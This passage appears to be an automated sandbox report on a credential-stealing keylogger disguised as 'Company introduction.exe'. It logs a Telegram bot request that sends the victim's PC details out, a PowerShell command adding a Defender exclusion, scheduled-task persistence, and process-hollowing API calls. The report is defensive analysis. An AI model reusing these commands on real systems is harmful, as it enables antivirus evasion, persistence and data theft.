                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1448&min_rtt=1437&rtt_var=561&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1914754&cwnd=232&unsent_bytes=0&cid=3f793fa416128135&ts=144&x=0"
                                                                                                                                                  2025-01-15 07:39:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  19192.168.2.449773149.154.167.2204438144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:17 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:14:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2025-01-15 07:39:17 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:17 GMT
                                                                                                                                                  Content-Type: application/json
                                                                                                                                                  Content-Length: 55
                                                                                                                                                  Connection: close
                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                  2025-01-15 07:39:17 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:02:38:58
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Company introduction.exe"
                                                                                                                                                  Imagebase:0xda0000
                                                                                                                                                  File size:854'528 bytes
                                                                                                                                                  MD5 hash:10F72E53A2C9F106093C233B56A3A819
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:2
                                                                                                                                                  Start time:02:39:00
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:3
                                                                                                                                                  Start time:02:39:01
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:02:39:01
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp"
                                                                                                                                                  Imagebase:0xb00000
                                                                                                                                                  File size:187'904 bytes
                                                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:02:39:01
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:6
                                                                                                                                                  Start time:02:39:01
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Company introduction.exe"
                                                                                                                                                  Imagebase:0xbc0000
                                                                                                                                                  File size:854'528 bytes
                                                                                                                                                  MD5 hash:10F72E53A2C9F106093C233B56A3A819
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2941471703.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:7
                                                                                                                                                  Start time:02:39:02
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                  File size:854'528 bytes
                                                                                                                                                  MD5 hash:10F72E53A2C9F106093C233B56A3A819
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 34%, ReversingLabs
                                                                                                                                                  • Detection: 29%, Virustotal, Browse
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:02:39:03
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                                                  File size:496'640 bytes
                                                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:9
                                                                                                                                                  Start time:02:39:03
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp"
                                                                                                                                                  Imagebase:0xb00000
                                                                                                                                                  File size:187'904 bytes
                                                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:10
                                                                                                                                                  Start time:02:39:03
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:11
                                                                                                                                                  Start time:02:39:04
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\FzXKnGk.exe"
                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                  File size:854'528 bytes
                                                                                                                                                  MD5 hash:10F72E53A2C9F106093C233B56A3A819
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:12
                                                                                                                                                  Start time:02:39:04
                                                                                                                                                  Start date:15/01/2025
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\FzXKnGk.exe"
                                                                                                                                                  Imagebase:0xed0000
                                                                                                                                                  File size:854'528 bytes
                                                                                                                                                  MD5 hash:10F72E53A2C9F106093C233B56A3A819
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  Disassembly

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:12.2%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:3.9%
                                                                                                                                                    Total number of Nodes:232
                                                                                                                                                    Total number of Limit Nodes:12
                                                                                                                                                    execution_graph 27843 14bea48 DuplicateHandle 27844 14beade 27843->27844 27862 14b4668 27863 14b4684 27862->27863 27864 14b469f 27863->27864 27868 14b4800 27863->27868 27873 14b4224 27864->27873 27866 14b46be 27869 14b4825 27868->27869 27877 14b4910 27869->27877 27881 14b4901 27869->27881 27874 14b422f 27873->27874 27889 14b7bbc 27874->27889 27876 14b7e7a 27876->27866 27879 14b4937 27877->27879 27878 14b4a14 27878->27878 27879->27878 27885 14b4524 27879->27885 27883 14b4937 27881->27883 27882 14b4a14 27882->27882 27883->27882 27884 14b4524 CreateActCtxA 27883->27884 27884->27882 27886 14b5da0 CreateActCtxA 27885->27886 27888 14b5e63 27886->27888 27890 14b7bc7 27889->27890 27892 14b894d 27890->27892 27893 14b7cbc 27890->27893 27892->27876 27894 14b7cc7 27893->27894 27897 14b7cec 27894->27897 27896 14b8a22 27896->27892 27898 14b7cf7 27897->27898 27901 14b7d1c 27898->27901 27900 14b8b25 27900->27896 27902 14b7d27 27901->27902 27905 14b97c0 27902->27905 27904 14b9ba8 27904->27900 27906 14b97cb 27905->27906 27907 14bb022 27906->27907 27909 14bb078 27906->27909 27907->27904 27910 14bb0c3 27909->27910 27911 14bb0ce KiUserCallbackDispatcher 27910->27911 27912 14bb0f8 27910->27912 27911->27912 27912->27907 27913 14be6e8 27914 14be6f5 27913->27914 27916 14be72f 27914->27916 27917 14be510 27914->27917 27918 14be51b 27917->27918 27919 14bf040 27918->27919 27921 14be63c 27918->27921 27922 14be647 27921->27922 27923 14b7d1c KiUserCallbackDispatcher 27922->27923 27924 14bf0af 27923->27924 27924->27919 27925 7e910c1 27926 7e91072 27925->27926 27927 7e910c7 27925->27927 27932 7e93a9e 27927->27932 27953 7e93a30 27927->27953 27973 7e93a40 27927->27973 27928 7e913ef 27933 7e93a2c 27932->27933 27935 7e93aa1 27932->27935 27993 7e93e88 27933->27993 27998 7e94117 27933->27998 28003 7e94212 27933->28003 28008 7e943d3 27933->28008 28013 7e944b0 27933->28013 28019 7e93e50 27933->28019 28024 7e940b1 27933->28024 28028 7e93f5e 27933->28028 28034 7e94318 27933->28034 28039 7e944f9 27933->28039 28043 7e94187 27933->28043 28051 7e94747 27933->28051 28056 7e94087 27933->28056 28061 7e93fe3 27933->28061 28069 7e93e40 27933->28069 28074 7e942ac 27933->28074 28079 7e9432b 27933->28079 27934 7e93a7e 27934->27928 27935->27928 27954 7e93a40 27953->27954 27956 7e93e88 2 API calls 27954->27956 27957 7e9432b 2 API calls 27954->27957 27958 7e942ac 2 API calls 27954->27958 27959 7e93e40 2 API calls 27954->27959 27960 7e93fe3 4 API calls 27954->27960 27961 7e94087 2 API calls 27954->27961 27962 7e94747 2 API calls 27954->27962 27963 7e94187 4 API calls 27954->27963 27964 7e944f9 2 API calls 27954->27964 27965 7e94318 2 API calls 27954->27965 27966 7e93f5e 2 API calls 27954->27966 27967 7e940b1 2 API calls 27954->27967 27968 7e93e50 2 API calls 27954->27968 27969 7e944b0 2 API calls 27954->27969 27970 7e943d3 2 API calls 27954->27970 27971 7e94212 2 API calls 27954->27971 27972 7e94117 2 API calls 27954->27972 27955 7e93a7e 27955->27928 27956->27955 27957->27955 27958->27955 27959->27955 27960->27955 27961->27955 27962->27955 27963->27955 27964->27955 27965->27955 27966->27955 27967->27955 27968->27955 27969->27955 27970->27955 27971->27955 27972->27955 27974 7e93a5a 27973->27974 27976 7e93e88 2 API calls 27974->27976 27977 7e9432b 2 API calls 27974->27977 27978 7e942ac 2 API calls 27974->27978 27979 7e93e40 2 API calls 27974->27979 27980 7e93fe3 4 API calls 27974->27980 27981 7e94087 2 API calls 27974->27981 27982 7e94747 2 API calls 27974->27982 27983 7e94187 4 API calls 27974->27983 27984 7e944f9 2 API calls 27974->27984 27985 7e94318 2 API calls 27974->27985 27986 7e93f5e 2 API calls 27974->27986 27987 7e940b1 2 API calls 27974->27987 27988 7e93e50 2 API calls 27974->27988 27989 7e944b0 2 API calls 27974->27989 27990 7e943d3 2 API calls 27974->27990 27991 7e94212 2 API calls 27974->27991 27992 7e94117 2 API calls 27974->27992 27975 7e93a7e 27975->27928 27976->27975 27977->27975 27978->27975 27979->27975 27980->27975 27981->27975 27982->27975 27983->27975 27984->27975 27985->27975 27986->27975 27987->27975 27988->27975 27989->27975 27990->27975 27991->27975 27992->27975 27994 7e93e3f 27993->27994 27995 7e93f3f 27994->27995 28085 7e90bba 27994->28085 28089 7e90bc0 27994->28089 27995->27934 28000 7e9414b 27998->28000 27999 7e94704 27999->27934 28000->27999 28093 7e90938 28000->28093 28097 7e90930 28000->28097 28005 7e9414b 28003->28005 28004 7e94704 28004->27934 28005->28004 28006 7e90938 WriteProcessMemory 28005->28006 28007 7e90930 WriteProcessMemory 28005->28007 28006->28005 28007->28005 28009 7e943d9 28008->28009 28101 7aefc38 28009->28101 28105 7aefc40 28009->28105 28010 7e9491e 28014 7e93f6a 28013->28014 28016 7e93f7c 28014->28016 28017 7aefc38 ResumeThread 28014->28017 28018 7aefc40 ResumeThread 28014->28018 28015 7e9491e 28016->27934 28017->28015 28018->28015 28020 7e93e8e 28019->28020 28022 7e90bba CreateProcessA 28020->28022 28023 7e90bc0 CreateProcessA 28020->28023 28021 7e93f3f 28021->27934 28022->28021 28023->28021 28026 7e90938 WriteProcessMemory 28024->28026 28027 7e90930 WriteProcessMemory 28024->28027 28025 7e940e8 28026->28025 28027->28025 28029 7e93f6a 28028->28029 28030 7e93f7c 28029->28030 28032 7aefc38 ResumeThread 28029->28032 28033 7aefc40 ResumeThread 28029->28033 28030->27934 28031 7e9491e 28032->28031 28033->28031 28035 7e945f0 28034->28035 28109 7aefce8 28035->28109 28113 7aefcf0 28035->28113 28036 7e9460b 28117 7e90a28 28039->28117 28121 7e90a22 28039->28121 28040 7e9451b 28047 7e90938 WriteProcessMemory 28043->28047 28048 7e90930 WriteProcessMemory 28043->28048 28044 7e93f6a 28045 7e93f7c 28044->28045 28049 7aefc38 ResumeThread 28044->28049 28050 7aefc40 ResumeThread 28044->28050 28045->27934 28046 7e9491e 28047->28044 28048->28044 28049->28046 28050->28046 28052 7e94754 28051->28052 28054 7aefc38 ResumeThread 28052->28054 28055 7aefc40 ResumeThread 28052->28055 28053 7e9491e 28054->28053 28055->28053 28057 7e94774 28056->28057 28059 7aefce8 Wow64SetThreadContext 28057->28059 28060 7aefcf0 Wow64SetThreadContext 28057->28060 28058 7e9478f 28059->28058 28060->28058 28062 7e94006 28061->28062 28125 7e90478 28062->28125 28129 7e90470 28062->28129 28063 7e94704 28063->27934 28064 7e94026 28064->28063 28065 7e90938 WriteProcessMemory 28064->28065 28066 7e90930 WriteProcessMemory 28064->28066 28065->28064 28066->28064 28070 7e93e54 28069->28070 28072 7e90bba CreateProcessA 28070->28072 28073 7e90bc0 CreateProcessA 28070->28073 28071 7e93f3f 28071->27934 28072->28071 28073->28071 28075 7e9414b 28074->28075 28076 7e94704 28075->28076 28077 7e90938 WriteProcessMemory 28075->28077 28078 7e90930 WriteProcessMemory 28075->28078 28076->27934 28077->28075 28078->28075 28080 7e93f6a 28079->28080 28081 7e93f7c 28080->28081 28083 7aefc38 ResumeThread 28080->28083 28084 7aefc40 ResumeThread 28080->28084 28081->27934 28082 7e9491e 28083->28082 28084->28082 28086 7e90c49 CreateProcessA 28085->28086 28088 7e90e0b 28086->28088 28088->28088 28090 7e90c49 CreateProcessA 28089->28090 28092 7e90e0b 28090->28092 28092->28092 28094 7e90980 WriteProcessMemory 28093->28094 28096 7e909d7 28094->28096 28096->28000 28098 7e90938 WriteProcessMemory 28097->28098 28100 7e909d7 28098->28100 28100->28000 28102 7aefc80 ResumeThread 28101->28102 28104 7aefcb1 28102->28104 28104->28010 28106 7aefc80 ResumeThread 28105->28106 28108 7aefcb1 28106->28108 28108->28010 28110 7aefcf0 Wow64SetThreadContext 28109->28110 28112 7aefd7d 28110->28112 28112->28036 28114 7aefd35 Wow64SetThreadContext 28113->28114 28116 7aefd7d 28114->28116 28116->28036 28118 7e90a36 ReadProcessMemory 28117->28118 28120 7e90ab7 28118->28120 28120->28040 28122 7e90a26 ReadProcessMemory 28121->28122 28124 7e90ab7 28122->28124 28124->28040 28126 7e904b8 VirtualAllocEx 28125->28126 28128 7e904f5 28126->28128 28128->28064 28130 7e90478 VirtualAllocEx 28129->28130 28132 7e904f5 28130->28132 28132->28064 27845 7e94ce0 27846 7e94e6b 27845->27846 27848 7e94d06 27845->27848 27848->27846 27849 7e90670 27848->27849 27850 7e94f60 PostMessageW 27849->27850 27851 7e94fcc 27850->27851 27851->27848 27852 14be800 27853 14be846 GetCurrentProcess 27852->27853 27855 14be898 GetCurrentThread 27853->27855 27856 14be891 27853->27856 27857 14be8ce 27855->27857 27858 14be8d5 GetCurrentProcess 27855->27858 27856->27855 27857->27858 27859 14be90b GetCurrentThreadId 27858->27859 27861 14be964 27859->27861 28133 14bc760 28134 14bc7a8 GetModuleHandleW 28133->28134 28135 14bc7a2 28133->28135 28136 14bc7d5 28134->28136 28135->28134

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 014B4208 Relevance: 3.1, Strings: 2, Instructions: 588COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Pp^q$d
                                                                                                                                                    • API String ID: 0-2169010058
                                                                                                                                                    • Opcode ID: 3925614c5186458ca8fd4ae210988a0f98b12c90d939f89cc94ad6718a8e86b4
                                                                                                                                                    • Instruction ID: 3b70357d44bd038a75ab9b322fbab62d6d1acd61682967fb1c151a4583cf1876
                                                                                                                                                    • Opcode Fuzzy Hash: 3925614c5186458ca8fd4ae210988a0f98b12c90d939f89cc94ad6718a8e86b4
                                                                                                                                                    • Instruction Fuzzy Hash: 7E62D174A00229CFCB65DF68C994AD9BBB1FF99300F0085E9D549A7364DB30AE95CF90
                                                                                                                                                    Function 014B7D63 Relevance: 3.1, Strings: 2, Instructions: 581COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Pp^q$d
                                                                                                                                                    • API String ID: 0-2169010058
                                                                                                                                                    • Opcode ID: a7b8abec283c9e109d24563cddcf2d8205cbd3dac4d6063e20bbc62c189324b4
                                                                                                                                                    • Instruction ID: 7349dc52c04d833da14d79afd4b28ef4cb656a29bc8269fb92376e5dc92c77fb
                                                                                                                                                    • Opcode Fuzzy Hash: a7b8abec283c9e109d24563cddcf2d8205cbd3dac4d6063e20bbc62c189324b4
                                                                                                                                                    • Instruction Fuzzy Hash: A362D074A00229CFCB25DF68C994AD9BBB1FF99300F0085EAD549A7365DB30AE95CF50
                                                                                                                                                    Function 014B4224 Relevance: 3.1, Strings: 2, Instructions: 579COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Pp^q$d
                                                                                                                                                    • API String ID: 0-2169010058
